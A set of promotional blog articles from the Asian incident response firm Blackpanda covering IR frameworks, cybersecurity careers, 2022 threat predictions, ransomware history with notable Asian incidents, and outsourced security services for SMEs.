Falling victim to ransomware can be a stressful and emotional time, and an experienced IR company such as Blackpanda provides invaluable help in containing the attack, eradicating the malware, and restoring business as usual, all whilst managing PR, negotiating with the attackers, and ensuring safety and legality throughout.
Blackpanda is Asia’s Premier Digital Forensics and Incident Response provider, and we support our clients by conducting regular compromise assessments to check for active threats in the network, preparing tabletop exercises and incident response plans to boost employee awareness, and responding to incidents promptly with Special Forces Expertise.
To learn more about our ransomware preparation services, or to report a breach, contact Blackpanda.
Incident response (IR) is the systematic approach to managing a cyber security incident. The primary objective of IR is to minimize the impact of a cyber attack, offer rapid recovery, and limit business interruption loss for organizations.
Incident response is carried out by specialists—via an in-house security operations unit or an outsourced incident response firm like Blackpanda—in the event of a cyber breach.
Experts like our incident response specialists are trained to handle various types of security incidents, cyber threats, and data breaches. The main goals of an incident response methodology are to identify, contain, eradicate, and minimize the duration and cost of a cyber breach.
What are the governing frameworks of incident response?
Thought leaders in the field of cyber security have established frameworks that serve as industry standard reference points to guide incident responders in the event of a cyber breach.
These frameworks include:
The National Institute of Standards and Technology ( NIST) framework
The System Admin, Audit, Network and Security (SANS) framework
The Observe, Orient, Decide, Act (OODA) loop
While each framework of reference has different terminology, it serves to address the same fundamental goal of incident response—respond rapidly, limit/eradicate the threat, and minimize business interruption loss.
First and foremost, it is important to determine whether a true breach or incident has occured, or if it was a false positive, and document it accordingly. Then it is crucial to identify the causes of the incident and minimize the impact of future incidents. Finally, the incident response team should guide the organization in applying lessons learned to improve the process.
Improving an organization’s security posture and ensuring thorough incident response planning is at the crux of all incident response frameworks. Whilst prosecuting illegal activity is never explicitly mentioned but always included in the considerations for remediation, as well as keeping management, staff and appropriate clients informed of the situation and response.
The NIST framework
The NIST Institute cyber security framework identifies five core functions of incident response:
Identify: This includes identifying physical and software assets, the organization’s business environment, established cybersecurity policies, asset vulnerabilities, threats to internal and external organizational resources, and risk response activities to assess risk.
Protect: This includes implementing protections for Identity Management and Access Control, empowering staff through security awareness training including role based and privileged user training. It also involves establishing data security protection best practices and implementing processes and procedures to maintain and manage the protections of information systems and assets.
Detect: Detecting potential cyber security incidents early is critical. This step has aims to ensure anomalies and events are detected , with their potential impact understood.
Respond: This step centers around the implementation and execution of the incident response plan in a swift manner, while managing communications with internal and external stakeholders during and after an event. Further, continuous analysis of the incident as it develops is crucial to ensure effective response and supporting recovery activities. These include forensic analysis, incident impact determination, and mitigation.
Recover: Recovery is the ultimate goal of incident response. It includes implementing improvements based on lessons learned and reviews of existing strategies, and coordinating with internal and external communications to restore business as usual.
The SANS framework
The SANS Institute delineates six phases that must be included in an incident response plan:
Preparation: Training and equipping the IR team and all involved individuals to manage cybersecurity incidents when they arise. Deploying monitoring tools and drafting IR plans are examples of preparation.
Identification: Determining and qualifying whether a particular event can be considered a security incident, and identifying the full scope of systems, devices, and endpoints involved.
Containment: Containing the incident across all systems in scope, and limiting the damage to prevent data loss and destruction of evidence.
Eradication: Identifying the root cause of the attack and mitigating the impact to the affected systems, either by removing or patching affected endpoints.
Recovery: Following the removal of corrupted elements, this phase ensures that affected systems are safely brought back to the operational environment and no threat remains.
Lessons Learned: The last but most critical phase includes completing all documentation requirements from all actions taken during the incident, conducting analysis and assessment of the response efforts to provide recommendations for the future.
The OODA framework
Lastly, the OODA (Observe, Orient, Decide, and Act) loop was developed by the US Air Force military strategist John Boyd. The OODA loop is often seen applied to cyber incident response in order to tackle incident handling in a real-time environment.
Observe: Continuous security monitoring helps in identifying abnormal network/system behavior. The observation goal is fulfilled through log analysis, SIEM and IDS alerts, network monitoring, vulnerability analysis, service/application performance monitoring.
Orient: This focuses on the evaluation of the cyber threat landscape of the organization through incident triage, threat intelligence, awareness regarding the current situation, and security research.
Decide: Based on observations and context, deciding an action plan that offers minimal downtime and fastest system recovery is a fundamental goal of rapid incident response.
Act: Thanks to forensic analysis tools, system backup, data recovery tools, security awareness training tools and programs, patch management, the incident response team should carry out remediation, recovery, and document lessons learned for future use.
_ _
While no one framework is deemed better than the other, they all share the same fundamental goal of eradicating a cyber threat and restoring business operations as quickly as possible. Your incident response provider must be able to walk you through the steps of incident response prior to or simultaneous to responding to an incident. These steps are calculated and follow a strict process to ensure incidents are handled properly.
Blackpanda responders are trained and certified to use the aforementioned methodologies to respond to cyber crises in a timely and swift manner, while providing timely updates to all parties involved. Pre-breach playbook development is a key step to expediting response and minimizing panic in the event of an incident. Reach out to us for further information on our Incident Response services and pre-breach prevention measures.
There has never been a better time to start a career in cyber security. The cyber security industry is experiencing exponential growth, with the market reaching a USD 156 billion valuation in 2020 with a projected rise to USD 352 billion by 2026, registering a growth rate of 14.5% between 2021 to 2026.
In Asia, jobs in cyber are growing at an even faster pace than in more established markets in North America and Europe. Whilst in the latter, the cyber industry has been around for decades, Asia’s scene is more nascent, and the opportunities are opening up across the region. To meet this demand, universities are also equipping themselves to arm younger generations with the skills to work in cyber security, with athenaeums by the likes of NUS, SUSS, HKU, and APU all offering undergraduate and postgraduate cyber security courses that have been introduced in recent years.
This growth is being driven by multiple factors. Concurrent advancements of technologies such as the internet of things (IoT), artificial intelligence (AI), and machine learning (ML) have sped up the rate of digital adoption in Asia. This has led to large strides in digital adoption with Singapore now being ranked the second most digitally competitive country in the world after the United States.
Moreover, the onset of remote working brought on by the pandemic has led to an increased rate of cyber incident frequency as organizations now face a higher risk of cyber breach due to the vulnerabilities of a decentralized workforce. The level of cyber risk that Asian companies face today can no longer be ignored or mitigated with simple antivirus tools alone and the need for more skilled cyber security professionals filling positions at companies of all sizes and industries.
Whether you are a student, a recent graduate, or someone who is thinking about making a pivot in their career, taking up a new job in cyber security could be the next step you’ve been looking for.
Use this helpful guide below to learn more about the career options available in cyber security starting with frequently asked questions about roles in the industry.
Do Cyber Security Jobs Pay Well?
Cyber security companies report that skilled talent is hard to find, and offer good pay and learning opportunities to those who have the relevant competencies and predisposition to grow into these roles.
Working in cyber security exposes you to a fast paced and rapidly developing environment. As the cyber threat landscape is constantly evolving, staying up to date on the latest cyber threats and malicious actors is crucial to success with new roles being born as cyber threats and cyber regulations develop.
In Asia, the following salary ranges can be expected for some of the most frequently in demand positions:
Cyber Security Analyst: USD 22,000 and USD 77,000 a year
Penetration Tester: USD 29,000 and USD 90,000 a year
Senior Security Consultant: Up to USD 103,000 a year
Chief Information Security Officer: Up to USD 255,000 a year
What Skills are Needed for a Career in Cyber Security?
The two most important factors that determine a successful cyber security career are exposure and experience.
Experience is key to building confidence with the different tools used in various cyber security situations, whilst exposure to a diverse number of areas is essential to becoming a well-rounded cyber security professional. This can be achieved by shadowing experienced professionals and learning from them, but also from online resources such as videos, webinars, and courses.
As far as hard skills go, those aspiring to both technical and non-technical roles in cyber security should have a basic knowledge of programming and understand the fundamentals of how a computer works. One way to achieve this is through a cyber security degree, which will empower you with the foundations to develop your career. Independent learning is also an option, with courses in C, C+, C++, Python, and Java available for free or at a low cost online, along with a vast library of learning materials.
For those already graduated from university or later in their career, cyber security certifications can also reflect your interest and expertise if your goal is to work in the cyber industry. Recommended certifications include CISSP, CISA, CISM, Security+, GSEC, CEH, SSCP, CASP, GCIH, and OSCP. Beyond signalling interest in the industry, achieving these certifications is a requirement for most non-entry level, technical positions, and can boost your chances of getting hired in the industry. On LinkedIn, almost 90,000 job postings have at least one cyber security certification in their role description.
Overall, while it may sound hard to get a job in cyber security, there are many options to make inroads into the still developing cyber job market that don’t require years of prior experience or a graduate degree like in other more established segments. Setting clear goals and working consistently to upskill yourself while gaining as much exposure and experience as possible is the best way to kick start your career in cyber.
What skills are needed for cyber security?
The two most important factors that determine a successful cyber security career are exposure and experience. Experience is key to building confidence with the different tools used in various cyber security situations, whilst exposure to a diverse number of areas is essential to becoming a well-rounded cyber security professional. This can be achieved by shadowing experienced professionals and learning from them, but also from online resources such as videos, webinars, and courses.
As far as hard skills go, those aspiring to both technical and non-technical roles in cyber security should have a basic knowledge of programming and understand the fundamentals of how a computer works. One way to achieve this is through a cyber security degree, which will empower you with the foundations to develop your career. Independent learning is also an option, with courses in C, C+, C++, Python, and Java available for free or at a low cost online, along with a vast library of learning materials.
For those already graduated from university or later in their career, cyber security certifications can also reflect your interest and expertise if your goal is to work in the cyber industry. Recommended certifications include CISSP, CISA, CISM, Security+, GSEC, CEH, SSCP, CASP, GCIH, and OSCP. Beyond signalling interest in the industry, achieving these certifications is a requirement for most non-entry level, technical positions, and can boost your chances of getting hired in the industry. On LinkedIn, almost 90,000 job postings have at least one cyber security certification in their role description.
Overall, while it may sound hard to get a job in cyber security, there are many options to make inroads into the still developing cyber job market that don’t require years of prior experience or a graduate degree like in other more established segments. Setting clear goals and working consistently to up-skill yourself while gaining as much exposure and experience as possible is the best way to kick start your career in cyber.
Roles in Cyber Security
As cyber security is a fairly new and evolving industry, the titles for similar roles across companies may differ and cause confusion for new job seekers. With that said, cyber security roles tend to fall into three key areas: management, technical, and senior leadership. Whilst the latter is only taken up by seasoned and experienced professionals, committing to one of the first two categories is an important decision to anyone starting their career in cyber. Below is a list of some of the most popular roles in cyber security.
Entry-Level Roles
Cyber Security Analyst
Security analysts are usually assigned tasks such as installing, managing, and updating software on company systems and networks. They are also responsible for ensuring that software on monitored endpoints has adequate security measures in place. Analysts may also assist security projects by compiling ongoing reports about the security posture of the networks they work on.
IT Monitoring Analyst
These roles typically perform network monitoring activities, targeting low level threats and submitting vulnerabilities to be patched by more experienced associates.
Junior Cyber Security Consultant
Junior cyber security consultants usually assist more senior consultants in projects for external clients. These can be company-wide cyber security posture assessments, digital transformation projects or problem-solving type exercises. Junior consultants will typically carry out data collection and analysis, as well as research and report writing.
Mid-Level Roles
Cyber Security Project Manager
Cyber security project managers work to create and implement process and technology components in security strategies. This requires project management programs to ensure solutions are implemented effectively and efficiently.
Cloud Security Specialist
As organizations move their data and operations to the cloud, the need to protect company cloud environments from cyber attacks has risen exponentially. Cloud specialists protect data and systems from compromise in off-premises or cloud environments.
Identity and Access Manager
Identity and access managers protect the confidentiality, integrity, and availability of data by managing user access to company networks. According to the principle of least privilege, all employees should only have access to what they need to have access to, and only when they need it.
Security Engineer
Enterprise security requires a layered approach, and security engineers work in the various stages of designing and building the layers of security systems required to protect the enterprise. These include building encryption systems, email security systems, firewalls, and more.
Security Operations Specialist
Roles in security operations focus on the active protection of an organization by keeping ongoing tabs on cyber defences and monitoring internal networks. They can work as part of an internal Security Operations Centre (SOC) or in a specialized Digital Forensics and Incident Response services provider like Blackpanda.
Ethical Hacker
Ethical hacking includes conducting Vulnerability Assessments and Penetration testing. Also known as “red teaming”, these roles attempt to penetrate networks by thinking like a criminal would, highlighting vulnerabilities and backdoors that need to be patched and protected.
Senior-Level Roles
Domain Manager
Depending on the size of the organization, every domain requires leadership and management. For many cyber technicians, this may present an opportunity to transition from doing hands-on work to leading and guiding a team.
Chief information Security Officer
Senior leadership is critical in cyber security. A CISO is a senior-level champion who steers the team and the company towards their optimal cyber security posture. To become a CISO, you need a broad range of experience and understanding across all areas of cybersecurity, as well as strong people and leadership skills.
Apply Now
As you can tell, the cyber security industry is a growing space, and it offers exciting opportunities for fresh grads and professionals seeking a career change alike. This fast-paced and rapidly changing environment offers enticing pay and a range of career development possibilities.
If you are interested in joining a rapidly expanding company specializing in white-glove Digital Forensics and Incident Response services for the APAC region, check out our current openings here.
2021 was a volatile year for cyber security in Asia with the world experiencing the highest growth in cyber threats to date fuelled largely by developments in attack techniques—ransomware in particular, with ransomware as a service (RaaS) and double extortion techniques gaining prominence.
The rise in attacks comes at a time when the barriers for entry into cyber crime are at their lowest, as threat actors face low risks and unprecedentedly high returns for their efforts. Consequently, cyber incident response providers have been tasked with stepping up to this challenge and staying up to date with the latest techniques and exploits leveraged by the growing number of cyber threat actors.
In light of this, our experts from the Blackpanda Digital Forensics and Incident Response team predict the current pace of cyber crime evolution to persevere in 2022. As “firefighters” combatting the flames on the front lines of cyber crisis, we have drawn upon our experience in the field to predict the top three attack trends that will likely dominate the cyber security landscape in Asia this upcoming year.
1) Ransomware
Ransomware demands reached an all-time high in 2021. In fact, ransomware cost the world USD 20 billion in 2021 and that number is expected to rise to USD 265 billion by 2031.
One of the most prominent attacks in Asian history was also carried out last year. AXA–one of the world’s largest cyber insurance companies—was targeted by a ransomware attack carried out by the cyber criminal gang Avaddon. The attackers were able to steal over three terabytes of files, including client passport details, ID cards, denied reimbursements, contracts, customer claims, payments to customers, bank account information, files from hospitals about fraud investigations, and medical reports that had sensitive information about patients.
Alongside large corporations, digital extortion is increasingly affecting small businesses as well. This trend is predicted to continue in 2022, with new ransomware techniques—such as double extortion—becoming more prevalent.
Growing ransom demands and increased regulation around ransomware payments will make professional incident handlers essential to ensure security and legality in ransomware negotiations. The Charter of United Nations Act 1945 and Autonomous Sanctions Act 2011 and their related regulations already prohibits making funds or assets available to sanctioned organisations. Moreover, Australian authorities have also come up with their own version of a Ransomware Action Plan that prohibits ransom payments, with other APAC countries expected to follow suit.
2) Zero-Day Attacks
Zero-day attacks are set to continue dominating headlines worldwide. This type of attack is caused by criminals exploiting the vulnerabilities that are present in unpatched software, discovering them before software developers become aware of them.
In late August 2021, Hong Kong iOS and Android users visiting a pro-democracy media website were targeted by a zero-day attack which installed spyware and stole data from their devices.
Later in the year, the Log4J Apache vulnerability was exploited on a global scale, affecting upwards of 3 billion devices worldwide. The Log4j zero-day is a clear example of how software vulnerabilities can be unknown until they are widely exploited, and can affect a large proportion of organisations. This means that the only way to mitigate an attack is through improved proactive security controls and rapid incident response.
3) Systemic Risk Events
As we saw last year with the Handa Hospital attack—where attackers were able to infect the facility’s networks thanks to a vulnerability in one of the hospital’s third-party contractors’ VPN—third party dependencies are and will continue to be a weak link in cyber defences. This is because smaller companies are generally an easier target for attackers, and they provide an access point for attackers to reach their larger partners.
Due to their widespread use, managed service and cloud computing providers will continue to be lucrative targets for cybercriminals. For this reason, the fear of the next large-scale systemic risk event—whereby a single event has the potential to impact thousands of businesses— should be at the forefront of everyone’s mind in the cyber security industry.
Furthermore, the most targeted industries and businesses are going to be those where standards for security have historically been weak. In particular, industrial manufacturers and distributors—who were especially targeted last year—will suffer from cyber attacks that will hinder their productivity given their dependencies on automation, robotics, and the supply chain as entryways in their networks. Businesses in these industries would be wise to invest in their cyber defences and educate employees to increase cyber security awareness at every level of the organisation.
What this Means for Cyber Incident Response
This year, a strong emphasis will be put on improving security standards for businesses in order to prevent attacks more effectively. Concurrently, government bodies will seek to ensure there is more transparency in cyber incident response, especially regarding ransomware payments—likely instituting bans and limitations for businesses looking to pay criminal groups for decryption keys.
With cyber attacks affecting 1 in 4 users, having a secure cyber incident response plan is now more crucial than ever. Whilst regular patching, security settings management apps, managed detection and response (MDR) software and good cyber hygiene provide a basic level of protection, they are fallible.
In 2022, having a trusted incident responder on call can make all the difference between surviving a cyber attack with limited losses and having to shut down business because of business interruption, bringing monetary and reputational losses. Blackpanda also recommends running quarterly Compromise Assessments to spot potential malware early and reduce its chances of causing havoc in company networks.
All Blackpanda consulting, compromise assessment, digital forensics, and incident response services are available through pre-paid retainers and specialist cyber insurance providers such as our partners at Pandamatics Underwriting. To learn more about Blackpanda services, reach out to our team here.
IR1: The most effective cyber risk management solution for SMEs in Asia
Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.
Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.
While previously confined to Fortune 500 companies and nation state infrastructure, ransomware attacks are now a threat to SMEs and individuals with new strains and ransom demands making headlines every week.
Attackers carry out ransomware attacks on businesses or individuals by gaining access to their networks most often through simple methods such as phishing or remote desktop compromise. Once the ransomware is downloaded onto an endpoint, it encrypts all the data on it and can spread to other endpoints in the network. This can happen within minutes of the attack’s penetration. By holding information hostage and locking users out of their systems, cyber attackers are able to demand ransom money in exchange for access to the system, giving the attack its distinctive name.
History of ransomware
While Ransomware has been making headlines for at least the past three years as a novel attack vector, the first recorded ransomware attack occurred almost thirty years ago. In 1989, a program dubbed “AIDS Trojan'' was distributed via floppy discs to unknowing attendees of a research conference. Believing the discs were research tools, these victims inserted the malware into their computers and watched their files become encrypted with the attackers demanding ransom by mail in exchange for instructions to decrypt their systems.
In the early 2000s, Distributed Denial of Service (DDoS) attacks were more common than ransomware. This trend shifted with the catastrophic attack known as WannaCry, which in 2017 compromised entire sectors around the world, initiating what some have called “the era of ransomware.”
The era of ransomware
One of the biggest innovations that supported the explosion of ransomware was the emergence of cryptocurrencies such as Bitcoin’s rise in 2010. This provided an easy and untraceable method for receiving payment from victims which created the opportunity for ransomware to become a lucrative and low-risk undertaking.
With the growth of ransomware came developments in its supply-chain as cyber criminal groups began to offer Ransomware-as-a-Service packages whereby malware programs are leased to clients around the world in exchange for a portion of their profit from ransom payments.
The most recent trend in ransomware development is data exfiltration. In 2020, there was a widespread adoption of ransomware paired with data-leak extortion tactics, which were rarely used by threat actors in previous years. This method involves both encrypting a victim organization’s environment and also exfiltrating data with the threat to leak it if the extortion demand is not paid.
This rapid evolution of ransomware is expected to continue at an accelerated rate as attackers and criminal groups continue to reinvent their techniques in order to apply as much pressure as possible to organizations in crisis. Ransom demands are also on the rise, with the average ransomware payment reaching USD 570,000, up almost 5x from USD 115,123 in 2019.
With Asia being particularly targeted—incidents spiked 64% in 2021 compared to the previous year—, the attacks in this region show now sign of slowing. In an effort to put future breaches into context with the attacks that have come before them, this article explores the most notable incidents that Asia has faced, thus far.
What are the most famous ransomware events in Asian history?
1. WannaCry
What: Global ransomware attack affecting Asian hospitals and other public and private organizations.
Where: Over 200,000 targets in at least 150 countries were severely affected by WannaCry. In Asia, nearly all computers in two major hospitals in Indonesia—Dharmais Hospital and Harapan Kita Hospital—were encrypted. Some Japanese and Singaporean organizations were also affected, along with university hospitals in Seoul and educational institutions in China.
When: On the 12th of May 2017, WannaCry began to spread around the world. The malware was halted a few hours later by the registration of a kill switch discovered by Marcus Hutchins. This prevented already infected computers from being further encrypted or spreading WannaCry, although the virus had already spread globally.
How: The virus exploited a vulnerability in Microsoft’s Windows software, which allowed it to penetrate computers and encrypt files on the PCs hard drive, rendering the devices inaccessible to users. The virus then demanded a ransom payment in bitcoin in order to decrypt them. The rapid spread of WannaCry was supported by the numerous high-profile systems, including Britain's National Health Service, that were hit by the attack and spread it across external systems that were connected. Of note, a novel variant of WannaCry forced Taiwan Semiconductor Manufacturing Company (TSMC) to temporarily shut down several of its chip-fabrication factories in August 2018.
Who: The attackers went long undetected, until in December 2017 the United States and United Kingdom formally asserted that Lazarus Group, a cybercrime organization that may be connected to the North Korean government, was behind the attack.
2. Singapore SingHealth and Hong Kong Health Department
What: A ransomware attack was launched against several businesses based in Singapore including multinational companies with operations in the city-state. SingHealth, Singapore’s public health network consisting of four hospitals, five national speciality centres, and eight polyclinics, was the most prominent institution hit by the attack. Files containing confidential outpatient prescriptions of 160,000 citizens, including Singapore Prime Minister Lee Hsien Loong and other ministers, were breached. In Hong Kong, computers belonging to the health department’s Infection Control Branch, Clinical Genetic Service and Drug Office were also hit, rendering the data inaccessible.
Where: Singapore and Hong Kong.
When: Between July and August 2018. Singapore was hit two weeks before Hong Kong with the attacks lasting a total of four weeks.
How: On the 20th of July, the Singapore Government declared that the personal particulars of 1.5 million patients in SingHealth were compromised in the Republic's worst ever cyber attack. Files stored on the computers were encrypted by ransomware and an e-mail address to contact for a decryption key was left behind but no ransom was demanded. SingHealth and Singapore's public healthcare sector IT agency IHIS were punished with penalties of S$250,000 and S$750,000 respectively, for the attack that breached the country's Personal Data Protection Act. The fines were the highest paid out to that date.
Who: A cyber criminal group named Whitefly was found by the Singapore government to be responsible for the attacks, six months after they occurred.
3. AXA Asia
What: One week after cyber insurer AXA France announced it changed its cyber insurance policy to stop coverage for ransom payments, the company's Asia Assistance division was hit by a ransomware attack. Hackers claimed to have seized three terabytes worth of sensitive data in Asia. Stolen data included screenshots of customer identity cards, passports, bank documents, hospital bills, and medical records.
Where: AXA’s Asia division was attacked, impacting IT operations in Thailand, Malaysia, Hong Kong and the Philippines. As a result, certain data processed by Inter Partners Asia (IPA) in Thailand was also accessed.
When: May 2021.
How: The Avaddon malware likely gained access to AXA’s network through a phishing email in Thailand, and then rapidly spread across the network to reach all the other endpoints. It then encrypted all files within a few minutes, making them irrecoverable and giving AXA ten days to make a decision regarding the ransom payment.
Who: The attack has been attributed to Avaddon, which had been active for about a year prior to the incident affecting the French insurance company. The group is thought to be based in Russia and offers its malware on a “Ransomware-as-a-Service” model to less sophisticated clients.
4. Tokio Marine
What: The attack targeted the company’s internal Windows servers, spreading to a large number of computers in the network. By intervening promptly, Tokio Marine was able to keep providing its insurance services during the course of the attack.
Where: Tokio Marine Insurance Singapore, a subsidiary of Tokio Marine Group, was targeted by the attack.
When: Between July and August 2021.
How: The ransomware attack affected Tokio Marine Singapore on a large scale, encrypting critical data across all company endpoints. After the ransomware was discovered, the network was isolated to prevent further damages. Tokio Marine also immediately filed the necessary reports to local governmental agencies, displaying a good level of preparedness to such a cyber attack. The Tokio Marine and the AXA ransomware attacks, which occurred within a few months from one another, is a sign of a growing trend of ransomware attacks targeting insurance companies. While some see this as a natural part of the shift in targets in the cyber crime industry, others recognize this as an answer to the hardening of the cyber insurance market, which is becoming more reluctant to paying for ransomware requests, effectively undermining the ransomware business model.
Who: The attacker of Tokio Marine was never disclosed, and investigations are still underway to understand exactly what type of malware was deployed and where it came from.
5. Eye & Retina Surgeons Singapore Eye Clinic
What: The attack affected the Eye & Retina Surgeons clinic server and management system. Data for an estimated 73,000 patients was affected by the breach. This comprised patient information, including names, addresses, identity card numbers, contact details, and clinical information such as clinical notes and eye scans.
Where: The Eye & Retina Surgeons clinic is based in Singapore.
When: The incident occurred on the 6th of August 2021.
How: A ransomware virus penetrated the network likely through a malicious email or phishing link, encrypting patient data as soon as it gained access to the business endpoints. Eye & Retina Surgeons decided not to pay the requested ransom and was unable to recover the lost files, although reports claim no data was leaked. The company worked closely with the Cyber Security Agency of Singapore to restore system health and resume its activities.
Who: The hackers responsible for this ransomware attack have not yet been identified.
IR-1: The most effective cyber risk management solution for SMEs in Asia
Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.
Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.
Cyber attacks are becoming more common. They are targeting organizations across all sectors and sizes, and small-medium enterprises (SMEs) and start-ups are getting hit especially hard. Research by Chubb found that 93% of SMEs that experienced a cyber incident reported a severe impact to their business. For these reasons, building their security will assist SMEs maintain confidence in the Asian and global markets while surviving an ever-changing cyber-threat panorama. Blackpanda’s cyber security services for small businesses can help your organization improve its cyber security posture.
How can small businesses improve their cyber security?
A frequent question we are asked at Blackpanda is: “Do small businesses need cyber security?”. The biggest misconception that exposes SMEs to cyber attacks is the sense of “security through obscurity”. Start-ups and SMEs tend to believe that they will never be targeted by cyber attacks because they are not important enough. This belief is no longer valid, as nowadays, most hackers are looking to target the most vulnerable companies rather than the biggest ones.
Today, hackers have adopted a “spray and pray” approach to attacking. This approach involves hackers trying their luck with thousands of accounts at a time and expecting that at least some of them open up opportunities for breaches. Other times, they identify potential targets through “hunter” bots that seek digital windows and doors left open or unlocked. This targeting has contributed to the dire statistic that 43% of all cyber attacks are against SMEs, which lack structural preparedness and organizational cyber security awareness, as well as the financial resilience necessary to survive an attack.
As global supply chains become larger and more complex, hackers often attack weak links in the chain - typically SME vendors - as a stepping stone to facilitate their subsequent penetration into the networks of larger institutions with stronger security.
In comparison to larger organizations, smaller businesses have busier teams with more tasks on their plate compared to larger organizations which leads SMEs to place cyber security lower on their priority list. As a consequence, employees have low cyber security awareness and do not follow cyber hygiene best practices. Cyber security’s low prioritisation also entails minimal budget allocation. Given budgetary constraints, many SMEs lack a cyber security team or are defended by IT support technicians who lack the institutional knowledge, skills and wide experience possessed by the dedicated cyber security teams of large enterprises. Technicians with little cyber security experience may not have the capability to conduct thorough and sophisticated cyber compromise assessments and respond to incidents as they occur. Naturally, hackers understand this weakness and leverage it by launching sophisticated attacks that less experienced teams cannot avert.
Importantly, SMEs lack the financial resilience to withstand the direct and indirect costs of a cyber attack - including downtime losses, incident response, legal and public relations expenses, to list a few - which can rack up to millions of US dollars. This weakness is the main reason for the statistic that 1 in 6 SMEs are compromised following a cyber attack, as businesses find it impossible to recover from the financial losses brought about by a single cyber attack. These compromised SMEs irreversibly lose clients since the company’s reputation is damaged for having been unable to safeguard its clients’ personal information.
Cyber security can feel intimidating and complicated to those whose expertise lie elsewhere, and for SMEs this is often the case. However, there are plenty of cyber security service options for small businesses. Outsourcing cyber security is a simple and cost-effective way to improve a company’s cyber security posture and assure partners, investors and clients of the business’ ability to protect their precious information and assets by adequately responding to cyber threats.
Outsourcing cyber security can help SMEs match large companies’ security posture
SMEs tend to see cyber security as an all or nothing deal —which does not have to be the case. By taking a leaf from the book of bigger companies and outsourcing essential cyber security tasks, SMEs can optimize their cyber security posture at a lower cost.
All large organisations follow the standardized approach laid in the National Institute of Standards and Technology (NIST) framework for their cyber security strategy. This offers guidance on how organization stakeholders can manage and reduce cyber security risk using business drivers - identifying the cyber security threat, protecting the digital infrastructure, and detecting malicious activity when they arise can go a long way in terms of protecting companies from cyber attacks.
However, the NIST framework does not exclusively apply to large companies: any company with a good cyber security posture knows that cyber security is not just about protection through antivirus. Whilst SMEs do not have the budget to build their own in-house SOC cyber security team as part of their lines of defense like big companies do, they can outsource these tasks to an independent Digital Forensics and Incident Response company; Blackpanda is one such firm.
How Blackpanda helps SMEs identify, protect, detect, respond and recover from a cyber attack
Blackpanda’s cyber security services offering helps SMEs achieve the cyber capabilities of larger organizations with in-house SOC teams, which carry out Security Information and Event Management (SIEM), threat intelligence, information risk management and Information Assurance (IA) on a daily basis. We help SMEs match this through a combination of cyber defense techniques, including Managed Detection and Response tools (MDR), Compromise Assessments, well-rehearsed Incident Response plans and playbooks, and retainer plans.
Proper cyber hygiene is key to minimizing open digital doors that can be exploited by attackers. Digital hygiene is the easiest starting point for all organizations to begin minimizing vulnerabilities and to improve their cyber security posture. Blackpanda provides cyber consulting services that include a care package to ensure that clients have a clear understanding of what steps to take to improve their cyber hygiene.
Identify
The first step in the NIST framework is to identify cyber threats. Identification is conducted through Endpoint Detection and Response (EDR) tools, which should be top of mind for anyone with a computer. Blackpanda works with existing EDR or —in absence of one— installs SentinelOne’s Singularity behavioural EDR on all client endpoints.
Protect
Blackpanda Incident Response Preparation and Consulting services help prepare your organization to defend against and respond to breaches before they occur. Our Incident Response experts work with your team to identify vulnerable assets, draft organizational response plans, and craft bespoke playbooks to common attack events and communications protocols, while thoroughly testing all processes to optimize response. By working closely with our clients, we are able to gain a profound understanding of the company, similarly to how Special Forces conduct terrain analysis before carrying out a mission.
Detect
Thanks to the logs generated by EDR, Blackpanda can gather critical information about the network and perform an initial Compromise Assessment to verify a company’s cyber security posture and eradicate any malware that is present in your network. Having existing malware is not uncommon at all; in fact, 100% of our first-time Compromise Assessments find one or more active malware in the client network.
Behavior-driven Compromise Assessments are vital to an organization’s cyber security, given that traditional EDR services monitor computers for malware activity by looking for preset queries. Malware, however, is continuously evolving, with new variants being generated daily. Traditional EDR lacks the ability to distinguish strains of malware that it has not been programmed to seek out. Due to this limitation, cyber attackers are often able to work quietly in the background, operating undetected in networks for as long as several years. As attackers employ sophisticated techniques to conceal their activity and avoid raising suspects, detecting such ongoing attacks can be highly complex.
For this reason, Blackpanda’s Level 3 Threat Hunting specialists conduct Compromise Assessments with a behavioral approach. Rather than looking for certain known malware, they look for abnormal software behavior and investigate it until they can define whether it should be perceived as a threat or not. Blackpanda Compromise Assessments involve extensive log investigations using a proprietary list of over 120+ advanced threat hunting queries, updated weekly to reflect the most recent and advanced threat intelligence. These queries are designed to uncover suspicious and malicious activities, which, paired with our behavioural searches, allow us to identify highly sophisticated and previously unknown strains of malware.
Further, Compromise Assessment clients can gain eligibility for cyber insurance offerings from select partners, including Pandamatics Underwriting.
Large Financial Institutions conduct Compromise Assessments daily, but we recommend smaller companies to do these at least once a quarter.
Respond
Blackpanda Digital Forensics and Incident Response specialists are available 24/7 to promptly respond to any cyber attack. In the event of an attack minimizing dwell time - the time that passes between the start of the breach and when it is eradicated - it is crucial to safeguard the network and reduce the amount of damage that an attacker can cause. By calling Blackpanda as soon as you discover a breach, we will be able to support you in the process of incident response and recovery. Whilst we make every effort to respond to those who contact us immediately, to enjoy prioritized response and reduced hourly rates we suggest purchasing an Incident Response and Consulting Services retainer, eliminating delays and ensuring that our team responds immediately to a breach.
When in the middle of a cyber crisis, knowing that you have a specialized team managing incident response and recovery provides peace of mind.
Recover
Due to lesser financial resilience against cyber attacks, SMEs can fall apart with a single breach. Having a sophisticated cyber insurance plan in place is the best way of managing the costs related to cyber security. Asia’s only cyber-only insurance company, Pandamatics Underwriting is partnered with BlackPanda and backed by the capital strength of Lloyds of London. Cyber policies not only cover the costs of incident response, but also the other unexpected expenses that come with facing a cyber attack, including legal, management, PR and cyber security services costs.
Conclusion
